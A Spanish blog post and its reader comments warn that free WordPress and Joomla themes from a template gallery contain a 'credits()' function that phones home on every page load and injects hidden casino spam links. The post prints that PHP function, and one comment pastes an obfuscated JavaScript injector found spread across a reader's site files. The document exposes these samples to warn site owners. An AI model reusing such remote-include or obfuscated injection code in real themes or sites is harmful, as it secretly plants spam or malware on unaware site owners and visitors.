Contenido

Código malicioso para themes para WordPress y Joomla

3 ago

+ 15

Hoy leyendo por Digg, me he encontrado un par de entradas en las que nos advierten de la insercción de código “malicioso” en los themes descargados de sitios como Templatesbrowser.com, o similares.

Y la verdad es que no es para menos, si despedazamos un theme al azar de los que muestran en su página (Blue Kino, por ejemplo) veremos que en el fichero functions.php tenes un función similar a esta. 

<?php

function credits()
{
 $url = "http://1.templatesbrowser.com/wp.php?" .
       "url=" . urlencode($_SERVER['REQUEST_URI']) . "&" . "host=" . urlencode($_SERVER['HTTP_HOST']);
 $check = @fsockopen("1.templatesbrowser.com", 80, $errno, $errstr, 3);
 if($check)
 {
  @readfile($url);
  fclose($check);
 }
}

?>

Se trata de una función que realizar una conexión mediante un socket a la página de Templatesbrowser y que devuelve un HTML con los créditos del theme. Si revisamos el fichero footer.php

<?php credits(); wp_footer(); ?>

Hasta aqui todo bien, pero al parecer, se está usando para insertar enlaces de forma oculta, aunque no he podido verlo por mis propios ojos, obteniendo enlaces ocultos como estos.

<div id="copyl" style="display: none;"><a
href="http://www.casinotropez.com/trcpromo-nincs-online-pmail18-fr">casino en ligne</a></div>

¿Como evitarlo?

Realmente la solución al problema es realmente sencillo, eliminar la función credits() del fichero footer.php. Pero entramos en el dilema del patrocinio de themes, ya que en cierta manera deberíamos dejar el enlaces a templatebrowser por haber descargado el theme de allí,… o ¿descargarlo de otro sitio?

  • Digo yo que solo sería cuestión de eliminar la función que hace esa llamada, el enlace se podrá dejar de una forma u otra :-P

  • Creo que una solución decorosa, sería eliminar la función credits() como mencionas, pero agregar un link al creador del theme.

  • Yo creo que no es un codigo malicioso sino que ya que todos los que descargan los themes quitan los creditos de los que los crean, pues que menos que el haga una forma almenos de publicitarse o sacar renta de eso… ;) es una buena tactica…

  • Lucas, a mi no me parece una buena táctica, si te meten enlaces ocultos de casinos online, viagra, contactos, y vete a saber que mas… si solo fuese un enlace al creador del theme, vale, pero esto otro… ni hablar :S

  • ¿Dilema de que? Si insertan codigo malicioso que se jodan.

  • Bueno si es cierto que enlaces de ese tipo no esta bien pero quizas sea una forma de ganar dinero para el dando publicidad no?

    o igual me equivoco… :S

  • Lucas, el problema es que esos themes no son de TemplateWorld, sinó que son libres o Creative Commons a los que se le añade ese enlace simplemente por está en una galería de themes…. hasta ahi… vale… pero que encima se enlacen a sitios web de forma oculta… y sin que el usuario sea consciente de ello es una estrategia muy fea.

  • Digo yo que lo eliminamos y listo

  • Pues el theme podria descargarse de alli, eliminar la funcion, y simplemente poner un enlace al sitio.

  • Casualmente es el theme que uso en mi blog, aunque ya lo tenía descargado desde el año pasado del sitio de themes de WP.

    Sobre lo de quitar los créditos me parece bastante discutible, por ejemplo, el autor de este theme ya no existe en Internet, al menos la web que referencia cuando lo instalas ¿por qué mantener un enlace a una web que no existe? Hice referencia a él en la entrada del cambio de theme y punto.

    Y en el caso de que se manipule el código debería avisarse, para que el usuario final lo supiera.

  • Yo soy partidario de SIEMPRE hacer referencia al autor, aunque sea sólo el nombre, sin enlace. Como desarrollador no me gustaría que la gente se aprovechará de mi trabajo eliminandolo de los créditos, siempre se puede mantener o hacer una mención. Así otros usuarios a los que les gustara el theme podrán encontrar de donde sacarlo.

  • mm una buena idea lo voy a colocar ese codigo en mis themes :P

  • tengo un problema, siempre se me instala este codigo en el wordpress y si va por todo el host incluyendo los archivos html de mi pagina normal, el codigo es este:

    ?><?php echo ‘function a0(s){b=”;for(i=0;i>1)b+=s.charAt(i);return b;}document.write(a0(’74u\x64n\151k\x76n40o\x73w\164n\x79 \154o\x65b75f\x22u\166s\x69c\163a\x69t\142i\x69o\154n\x69u\164n\x79k72n\x68o\151w\x64n\144 \x65o\156b\x22f76u\x3cs\151c\x66a\162t\x61i\155o\x65n40u\x73n\162k\x63n75o\x22w\150n\x74 \164o\x70b72f\x2fu57s\x39c61a\x2et62i\x31o61n\x2eu66n\x34k56n\x31o70w\x30n57 \x63o\147b\x69f55u\x62s\151c\x6ea57t\x69i\156o\x64n\145u\x78n56k\x63n\147o\x69w77n\x75 \163o\x65b\162f\x31u42s\x20c\166a\x69t\163i\x69o\142n\x69u\154n\x69k\164n\x79o72w\x68n\151 \x64o\144b\x65f\156u\x20s\167c\x69a\144t\x74i\150o\x3dn61u\x30n60k\x20n\150o\x65w\151n\x67 \150o\x74b75f\x38u60s\x3ec74a\x2ft\151i\x66o\162n\x61u\155n\x65k76n\x3co57w\x64n\151 \x76o76b’));'; ?>

    El codigo se instala en todos los archivos, pensé primero que era por los templates, entonces borre todo e instalé nuevamente sin subir carpetas ajenas a las qe vienen originales a wordpress.org y para mi sorpresa hoy me sucedio lo mismo.
    Tienen alguna idea de lo que pasa?
    Saludos

Comentar

#

Me reservo el derecho de eliminar y/o modificar los comentarios que contengan lenguaje inapropiado, spam u otras conductas no apropiadas en una comunidad civilizada. Si tu comentario no aparece, puede ser que akismet lo haya capturado, cada día lo reviso y lo coloco en su lugar. Siento las molestias.